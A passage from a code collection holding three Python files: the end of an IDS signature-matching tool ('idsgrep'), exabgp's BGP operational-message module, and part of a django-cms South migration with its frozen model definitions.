        config.read([args.conf_file])
        # Bug fix: removed stray debug "print args.conf_file" -- this tool
        # writes its matches to stdout, so the debug line corrupted output.
        # NOTE(review): raises NoSectionError if the file has no [Defaults]
        # section -- TODO confirm whether that should be handled gracefully.
        defaults = dict(config.items("Defaults"))
    else:
        defaults = { }
    # Parse rest of arguments
    # Don't suppress add_help here so it will handle -h
    parser = argparse.ArgumentParser(
        # Inherit options from config_parser
        description=__doc__, # printed with -h/--help
        usage=USAGE,
        parents=[conf_parser]
    )
    parser.set_defaults(**defaults)
    parser.add_argument ('--black-db',metavar="HOST", default=None,help='Blacklist MongoDB database')
    parser.add_argument ('--asset-db',metavar="HOST",default=None,help='Assetlist MongoDB database')
    parser.add_argument ('-b','--black-file',metavar="FILE",default="",help='Blacklist file')
    parser.add_argument ('-a','--asset-file',metavar="FILE",default="",help='Assetlist file')
    parser.add_argument ('-s','--save-to-mongodb',default=False, action="store_true", help='Store alarms in mongoDB')
    parser.add_argument ('-q','--quiet',default=False, action="store_true", help='')
    parser.add_argument ('--min-fx',metavar="NUM",default=5, help='')
    parser.add_argument ('--no-color',default=False, action="store_true", help='')
    parser.add_argument ('--splunk',default=False, action="store_true", help='')
    parser.add_argument ('--tmpdir',metavar="DIR",default="/tmp/", help='Folder for temporary files')
    parser.add_argument ('--logfile',metavar="FILE",default="", help='Logfile')
    parser.add_argument('-v', nargs='?', action=VAction, dest='verbose',default=2)
    parser.add_argument ('files', nargs="*",default=None, help='')
    return parser.parse_args(remaining_argv)
def setup_logging(args):
    """Set root-logger verbosity from args.verbose and optionally attach
    a DEBUG-level file handler when args.logfile is non-empty.

    Verbosity 0 effectively disables logging (level 50 == CRITICAL).
    """
    log_mapping={
        0:50, #Disable logging
        1:logging.ERROR,
        2:logging.WARNING,
        3:logging.INFO,
        4:logging.DEBUG
    }
    logging.root.setLevel(log_mapping[args.verbose])
    try:
        if args.logfile:
            fh = logging.FileHandler(args.logfile)
            fh.setLevel(logging.DEBUG)
            fh_formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
            # Bug fix: the handler must use the formatter created above;
            # "console_formatter" was an undefined name and raised NameError
            # whenever a logfile was configured.
            fh.setFormatter(fh_formatter)
            logging.getLogger('').addHandler(fh)
    except IOError as e:
        # Fall back to console-only logging when the logfile is unwritable.
        logging.warning("Can't write log to logfile %s", args.logfile)
class VAction(argparse.Action):
    """argparse action for -v: accepts "-v", "-vvv" or "-v N", storing an int."""

    def __call__(self, parser, args, values, option_string=None):
        if values is None:
            values = '1'
        try:
            level = int(values)
        except ValueError:
            # "-vvv" arrives as the string "vv": count the v's plus the
            # option itself.
            level = values.count('v') + 1
        setattr(args, self.dest, level)
class TibIDS(object):
    """Drives the matching run: builds the blacklist/asset signature sets
    from CLI options, then streams matches as Alarm objects."""
    def __init__(self,args):
        self.args=args
        # Blacklist source priority: explicit file, then MongoDB, then the
        # first positional argument treated as a literal signature string.
        if args.black_file:
            self.black=signatureset.SignatureSetFile(self.args.black_file)
        elif args.black_db:
            self.black=signatureset.SignatureSetMongoDb(self.args.black_db,"sigdb","black")
        else:
            if args.files:
                # Consumes the first positional arg, leaving the rest as input files.
                strsig=self.args.files.pop(0)
                self.black=signatureset.SignatureSetText(strsig)
            else:
                print "Missing signatures."
                print "Try `idsgrep --help' for more information."
                sys.exit(1)
        # Asset (victim) list is optional.
        if self.args.asset_file:
            self.asset=signatureset.SignatureSetFile(self.args.asset_file)
        elif self.args.asset_db:
            self.asset=signatureset.SignatureSetMongoDb(self.args.asset_db,"sigdb","asset")
        else:
            self.asset=None
        self.black_search=matchingengine.FGrepMatchingEngine(self.black,min_fx=int(self.args.min_fx))
        if self.asset:
            self.asset_search=matchingengine.MatchingEngine(self.asset)
        # NOTE: the constructor runs the whole scan as a side effect.
        if self.args.splunk:
            self.start_splunk()
        else:
            self.start()
    def search(self):
        """Yield an Alarm for every blacklist match found in the input files."""
        for matches in self.black_search.findall_files(self.args.files):
            victim=self.find_victim(matches[0].data)
            yield alarm.Alarm(matches,victim)
    def find_victim(self,data):
        """Return the matched asset substring in data, or None if no asset list."""
        #TODO find the most important victim, not the first
        if not self.asset:
            return None
        victims=self.asset_search.findall(data)
        for v in victims:
            # Returns on the first hit (see TODO above).
            return v.data[v.start:v.stop]
    def start_splunk(self):
        """Read CSV from stdin and emit CSV with sig/score/victim columns appended."""
        fieldnames=csv.DictReader(sys.stdin).fieldnames
        fieldnames.append("sig")
        fieldnames.append("score")
        fieldnames.append("victim")
        print ",".join(fieldnames)
        for alarm in self.search():  # NOTE: local name shadows the alarm module here
            for match in alarm.matches:
                print alarm.data + "," + ",".join([match.sig["sig"],str(match.sig["score"]),alarm.victim])
    def start(self):
        """Print each alarm (optionally colorized) and optionally persist to MongoDB."""
        for alarm in self.search():  # NOTE: local name shadows the alarm module here
            if not self.args.quiet:
                if self.args.no_color:
                    print alarm.data
                else:
                    print alarm.colors()
            if self.args.save_to_mongodb:
                alarm.save("alarms","alarms")
# Script entry point.
if __name__=="__main__":
    main()
| gpl-3.0 |
lochiiconnectivity/exabgp | lib/exabgp/bgp/message/operational.py | 1 | 9147 | # encoding: utf-8
"""
operational/__init__.py
Created by Thomas Mangin on 2013-09-01.
Copyright (c) 2009-2015 Exa Networks. All rights reserved.
"""
from struct import pack
from struct import unpack
from exabgp.protocol.family import AFI
from exabgp.protocol.family import SAFI
from exabgp.bgp.message.open.routerid import RouterID
from exabgp.bgp.message import Message
# ========================================================================= Type
#
MAX_ADVISORY = 2048 # 2K
class Type (int):
	"""A 16-bit operational message type code (wire format: network-order u16)."""

	def pack (self):
		return pack('!H',self)

	def extract (self):
		return [pack('!H',self)]

	def __len__ (self):
		# Always two bytes on the wire.
		return 2

	def __str__ (self):
		# Bug fix: this was a bare "pass", so __str__ returned None and
		# str(Type(...)) raised TypeError.  Render the numeric code.
		return str(int(self))
# ================================================================== Operational
#
class Operational (Message):
	"""BGP OPERATIONAL message (draft-ietf-idr-operational-message).

	Subclasses register themselves via register_operational() keyed by
	their numeric code, so unpack_message() can dispatch by wire type.
	"""
	ID = Message.ID.OPERATIONAL
	TYPE = chr(Message.ID.OPERATIONAL)

	# code -> (category, class) registry filled by register_operational().
	registered_operational = dict()

	has_family = False
	has_routerid = False
	is_fault = False

	# NOTE(review): this nested class rebinds Operational.ID, shadowing the
	# message-ID constant assigned above -- verify that nothing reads
	# Operational.ID expecting the numeric message type.
	class ID (object):
		__slots__ = []

		# ADVISE
		ADM = 0x01 # 01: Advisory Demand Message
		ASM = 0x02 # 02: Advisory Static Message
		# STATE
		RPCQ = 0x03 # 03: Reachable Prefix Count Request
		RPCP = 0x04 # 04: Reachable Prefix Count Reply
		APCQ = 0x05 # 05: Adj-Rib-Out Prefix Count Request
		APCP = 0x06 # 06: Adj-Rib-Out Prefix Count Reply
		LPCQ = 0x07 # 07: BGP Loc-Rib Prefix Count Request
		LPCP = 0x08 # 08: BGP Loc-Rib Prefix Count Reply
		SSQ = 0x09 # 09: Simple State Request
		# DUMP
		DUP = 0x0A # 10: Dropped Update Prefixes
		MUP = 0x0B # 11: Malformed Update Prefixes
		MUD = 0x0C # 12: Malformed Update Dump
		SSP = 0x0D # 13: Simple State Response
		# CONTROL
		MP = 0xFFFE # 65534: Max Permitted
		NS = 0xFFFF # 65535: Not Satisfied

	def __init__ (self,what):
		Message.__init__(self)
		self.what = Type(what)

	def _message (self,data):
		# TLV framing: 2-byte type, 2-byte length, then the payload.
		return Message._message(self,"%s%s%s" % (
			self.what.pack(),
			pack('!H',len(data)),
			data
		))

	def __str__ (self):
		return self.extensive()

	def extensive (self):
		return 'operational %s' % self.name

	@classmethod
	def register_operational (cls):
		# Called once per concrete subclass; keys the dispatch table below.
		cls.registered_operational[cls.code] = (cls.category,cls)

	@classmethod
	def unpack_message (cls,data,negotiated):
		# Wire layout: type(2) length(2) then a category-specific body.
		what = Type(unpack('!H',data[0:2])[0])
		length = unpack('!H',data[2:4])[0]
		decode,klass = cls.registered_operational.get(what,('unknown',None))
		if decode == 'advisory':
			# afi(2) safi(1) free-form advisory text
			afi = unpack('!H',data[4:6])[0]
			safi = ord(data[6])
			data = data[7:length+4]
			return klass(afi,safi,data)
		elif decode == 'query':
			# afi(2) safi(1) router-id(4) sequence(4)
			afi = unpack('!H',data[4:6])[0]
			safi = ord(data[6])
			routerid = RouterID.unpack(data[7:11])
			sequence = unpack('!L',data[11:15])[0]
			return klass(afi,safi,routerid,sequence)
		elif decode == 'counter':
			# afi(2) safi(1) router-id(4) sequence(4) counter(4)
			afi = unpack('!H',data[4:6])[0]
			safi = ord(data[6])
			routerid = RouterID.unpack(data[7:11])
			sequence = unpack('!L',data[11:15])[0]
			counter = unpack('!L',data[15:19])[0]
			return klass(afi,safi,routerid,sequence,counter)
		else:
			# NOTE(review): unknown types are only reported on stdout and
			# the function implicitly returns None -- confirm callers cope.
			print 'ignoring ATM this kind of message'

Operational.register_message()
# ============================================================ OperationalFamily
#
class OperationalFamily (Operational):
	"""Operational message scoped to an (AFI, SAFI) address family."""
	has_family = True

	def __init__ (self,what,afi,safi,data=''):
		Operational.__init__(self,what)
		self.afi = AFI(afi)
		self.safi = SAFI(safi)
		self.data = data

	def family (self):
		# (AFI, SAFI) tuple this message applies to.
		return (self.afi,self.safi)

	def _message (self,data):
		# Prefix the payload with the packed AFI/SAFI before TLV framing.
		return Operational._message(self,"%s%s%s" % (
			self.afi.pack(),
			self.safi.pack(),
			data
		))

	def message (self,negotiated):
		return self._message(self.data)
# =================================================== SequencedOperationalFamily
#
class SequencedOperationalFamily (OperationalFamily):
	"""Family-scoped operational message carrying a router-id and an
	auto-incrementing per-router sequence number."""
	# Class-level, shared across instances: last sequence used per router-id.
	__sequence_number = {}

	has_routerid = True

	def __init__ (self,what,afi,safi,routerid,sequence,data=''):
		OperationalFamily.__init__(self,what,afi,safi,data)
		# Falsy router-id/sequence are normalised to None (auto-fill on send).
		self.routerid = routerid if routerid else None
		self.sequence = sequence if sequence else None
		self._sequence = self.sequence
		self._routerid = self.routerid

	def message (self,negotiated):
		# Default the router-id to the one we sent in our OPEN.
		self.sent_routerid = self.routerid if self.routerid else negotiated.sent_open.router_id
		if self.sequence is None:
			# NOTE(review): the counter is read keyed on self.routerid (which
			# may be None) but stored under sent_routerid -- confirm intended.
			self.sent_sequence = (self.__sequence_number.setdefault(self.routerid,0) + 1) % 0xFFFFFFFF
			self.__sequence_number[self.sent_routerid] = self.sent_sequence
		else:
			self.sent_sequence = self.sequence
		return self._message("%s%s%s" % (
			self.sent_routerid.pack(),pack('!L',self.sent_sequence),
			self.data
		))
# =========================================================================== NS
#
class NS:
	"""Error subcodes for the Not Satisfied (NS) operational reply."""
	MALFORMED = 0x01 # Request TLV Malformed
	UNSUPPORTED = 0x02 # TLV Unsupported for this neighbor
	MAXIMUM = 0x03 # Max query frequency exceeded
	PROHIBITED = 0x04 # Administratively prohibited
	BUSY = 0x05 # Busy
	NOTFOUND = 0x06 # Not Found
class _NS (OperationalFamily):
	"""Base for Not-Satisfied fault replies; payload is the echoed request
	sequence followed by the subclass's 2-byte ERROR_SUBCODE."""
	is_fault = True

	def __init__ (self,afi,safi,sequence):
		OperationalFamily.__init__(
			self,
			Operational.ID.NS,
			afi,safi,
			'%s%s' % (sequence,self.ERROR_SUBCODE)
		)

	def extensive (self):
		return 'operational NS %s %s/%s' % (self.name,self.afi,self.safi)
# Concrete NS faults: each subclass only fixes the human-readable name and
# the two-byte error subcode appended after the sequence (see NS constants).
class Malformed (_NS):
	name = 'NS malformed'
	ERROR_SUBCODE = '\x00\x01' # pack('!H',MALFORMED)

class Unsupported (_NS):
	name = 'NS unsupported'
	ERROR_SUBCODE = '\x00\x02' # pack('!H',UNSUPPORTED)

class Maximum (_NS):
	name = 'NS maximum'
	ERROR_SUBCODE = '\x00\x03' # pack('!H',MAXIMUM)

class Prohibited (_NS):
	name = 'NS prohibited'
	ERROR_SUBCODE = '\x00\x04' # pack('!H',PROHIBITED)

class Busy (_NS):
	name = 'NS busy'
	ERROR_SUBCODE = '\x00\x05' # pack('!H',BUSY)

class NotFound (_NS):
	name = 'NS notfound'
	ERROR_SUBCODE = '\x00\x06' # pack('!H',NOTFOUND)
# ===================================================================== Advisory
#
class Advisory:
	"""Namespace for the advisory messages (ADM demand / ASM static)."""
	class _Advisory (OperationalFamily):
		category = 'advisory'

		def extensive (self):
			return 'operational %s afi %s safi %s "%s"' % (self.name,self.afi,self.safi,self.data)

	class ADM (_Advisory):
		name = 'ADM'
		code = Operational.ID.ADM

		# NOTE(review): the routerid parameter is accepted but unused in
		# both ADM and ASM -- confirm whether it should be forwarded.
		def __init__ (self,afi,safi,advisory,routerid=None):
			utf8 = advisory.encode('utf-8')
			if len(utf8) > MAX_ADVISORY:
				# Truncate oversized advisories; NOTE(review): the byte-level
				# cut may split a multi-byte UTF-8 character.
				utf8 = utf8[:MAX_ADVISORY-3] + '...'.encode('utf-8')
			OperationalFamily.__init__(
				self,Operational.ID.ADM,
				afi,safi,
				utf8
			)

	class ASM (_Advisory):
		name = 'ASM'
		code = Operational.ID.ASM

		def __init__ (self,afi,safi,advisory,routerid=None):
			utf8 = advisory.encode('utf-8')
			if len(utf8) > MAX_ADVISORY:
				utf8 = utf8[:MAX_ADVISORY-3] + '...'.encode('utf-8')
			OperationalFamily.__init__(
				self,Operational.ID.ASM,
				afi,safi,
				utf8
			)

# Register both advisory types in the unpack dispatch table.
Advisory.ADM.register_operational()
Advisory.ASM.register_operational()
# a = Advisory.ADM(1,1,'string 1')
# print a.extensive()
# b = Advisory.ASM(1,1,'string 2')
# print b.extensive()
# ======================================================================== Query
#
class Query:
    # Query operational messages: ask a peer for one of its counters.
    class _Query (SequencedOperationalFamily):
        category = 'query'

        def __init__ (self, afi, safi, routerid, sequence):
            SequencedOperationalFamily.__init__(self, self.code, afi, safi, routerid, sequence)

        def extensive (self):
            # Router-id and sequence are optional; omit them unless both are set.
            if not (self._routerid and self._sequence):
                return 'operational %s afi %s safi %s' % (self.name, self.afi, self.safi)
            return 'operational %s afi %s safi %s router-id %s sequence %d' % (
                self.name, self.afi, self.safi, self._routerid, self._sequence)

    class RPCQ (_Query):
        name = 'RPCQ'
        code = Operational.ID.RPCQ

    class APCQ (_Query):
        name = 'APCQ'
        code = Operational.ID.APCQ

    class LPCQ (_Query):
        name = 'LPCQ'
        code = Operational.ID.LPCQ
# Register the query message classes with the operational-message factory.
Query.RPCQ.register_operational()
Query.APCQ.register_operational()
Query.LPCQ.register_operational()
# ===================================================================== Response
#
class Response:
    # Response operational messages: report a counter value back to a peer.
    class _Counter (SequencedOperationalFamily):
        category = 'counter'

        def __init__ (self, afi, safi, routerid, sequence, counter):
            # Keep the raw integer for display; the wire form is a 32-bit
            # network-order unsigned value.
            self.counter = counter
            SequencedOperationalFamily.__init__(
                self, self.code, afi, safi, routerid, sequence, pack('!L', counter))

        def extensive (self):
            # Router-id and sequence are optional; omit them unless both are set.
            if not (self._routerid and self._sequence):
                return 'operational %s afi %s safi %s counter %d' % (self.name, self.afi, self.safi, self.counter)
            return 'operational %s afi %s safi %s router-id %s sequence %d counter %d' % (
                self.name, self.afi, self.safi, self._routerid, self._sequence, self.counter)

    class RPCP (_Counter):
        name = 'RPCP'
        code = Operational.ID.RPCP

    class APCP (_Counter):
        name = 'APCP'
        code = Operational.ID.APCP

    class LPCP (_Counter):
        name = 'LPCP'
        code = Operational.ID.LPCP
# Register the counter response classes with the operational-message factory.
Response.RPCP.register_operational()
Response.APCP.register_operational()
Response.LPCP.register_operational()
# c = Query.RPCQ(1,1,'82.219.0.1',10)
# print c.extensive()
# d = Response.RPCP(1,1,'82.219.0.1',10,10000)
# print d.extensive()
# ========================================================================= Dump
#
class Dump:
    # Placeholder: dump operational messages are not implemented here.
    pass
| bsd-3-clause |
MagicSolutions/django-cms | cms/migrations/0029_limit_visibility_in_menu_step2of3_data.py | 525 | 20033 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
# Resolve the project's user model in a way that works across Django versions:
# Django >= 1.5 exposes get_user_model() (supporting custom user models),
# while older releases only provide django.contrib.auth.models.User.
try:
    from django.contrib.auth import get_user_model
except ImportError: # django < 1.5
    from django.contrib.auth.models import User
else:
    User = get_user_model()

# Labels used to reference the (possibly swapped) user model inside the
# frozen-ORM 'models' definition below, e.g. 'auth.User' / 'auth.user'.
user_orm_label = '%s.%s' % (User._meta.app_label, User._meta.object_name)
user_model_label = '%s.%s' % (User._meta.app_label, User._meta.module_name)
user_ptr_name = '%s_ptr' % User._meta.object_name.lower()
class Migration(SchemaMigration):
    """Intentionally empty South migration (step 2 of 3).

    Both directions are no-ops; the migration exists only to keep the
    migration sequence consistent.  ``models`` is South's frozen snapshot
    of the ORM at the time this migration was generated.
    """

    def forwards(self, orm):
        # Dummy migration
        pass

    def backwards(self, orm):
        # Dummy migration
        pass

    # Frozen ORM state (generated by South; do not edit by hand).
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        # The user model entry is keyed dynamically so the frozen ORM follows
        # a swapped custom user model as well as the stock auth.User.
        user_model_label: {
            'Meta': {'object_name': User.__name__, 'db_table': "'%s'" % User._meta.db_table},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'cms.cmsplugin': {
            'Meta': {'object_name': 'CMSPlugin'},
            'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
            'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
            'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
            'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
            'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
        },
        'cms.globalpagepermission': {
            'Meta': {'object_name': 'GlobalPagePermission'},
            'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_moderate': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_recover_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
        },
        'cms.page': {
            'Meta': {'ordering': "('site', 'tree_id', 'lft')", 'object_name': 'Page'},
            'changed_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
            'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'created_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
            'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'limit_visibility_in_menu': ('django.db.models.fields.SmallIntegerField', [], {'default': 'None', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
            'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'moderator_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1', 'blank': 'True'}),
            'navigation_extenders': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '80', 'null': 'True', 'blank': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['cms.Page']"}),
            'placeholders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cms.Placeholder']", 'symmetrical': 'False'}),
            'publication_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'publication_end_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'publisher_is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
            'publisher_public': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
            'publisher_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
            'reverse_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '40', 'null': 'True', 'blank': 'True'}),
            'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
            'soft_root': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'template': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
        },
        'cms.pagemoderator': {
            'Meta': {'object_name': 'PageModerator'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'moderate_children': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'moderate_descendants': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'moderate_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label})
        },
        'cms.pagemoderatorstate': {
            'Meta': {'ordering': "('page', 'action', '-created')", 'object_name': 'PageModeratorState'},
            'action': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'message': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}),
            'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True'})
        },
        'cms.pagepermission': {
            'Meta': {'object_name': 'PagePermission'},
            'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_moderate': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'grant_on': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
            'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']", 'null': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
        },
        'cms.pageuser': {
            'Meta': {'object_name': 'PageUser', '_ormbases': [user_orm_label]},
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_users'", 'to': "orm['%s']" % user_orm_label}),
            'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['%s']" % user_orm_label, 'unique': 'True', 'primary_key': 'True'})
        },
        'cms.pageusergroup': {
            'Meta': {'object_name': 'PageUserGroup', '_ormbases': ['auth.Group']},
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_usergroups'", 'to': "orm['%s']" % user_orm_label}),
            'group_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.Group']", 'unique': 'True', 'primary_key': 'True'})
        },
        'cms.placeholder': {
            'Meta': {'object_name': 'Placeholder'},
            'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
        },
        'cms.title': {
            'Meta': {'unique_together': "(('language', 'page'),)", 'object_name': 'Title'},
            'application_urls': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'has_url_overwrite': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
            'menu_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'meta_description': ('django.db.models.fields.TextField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'meta_keywords': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'title_set'", 'to': "orm['cms.Page']"}),
            'page_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
            'redirect': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
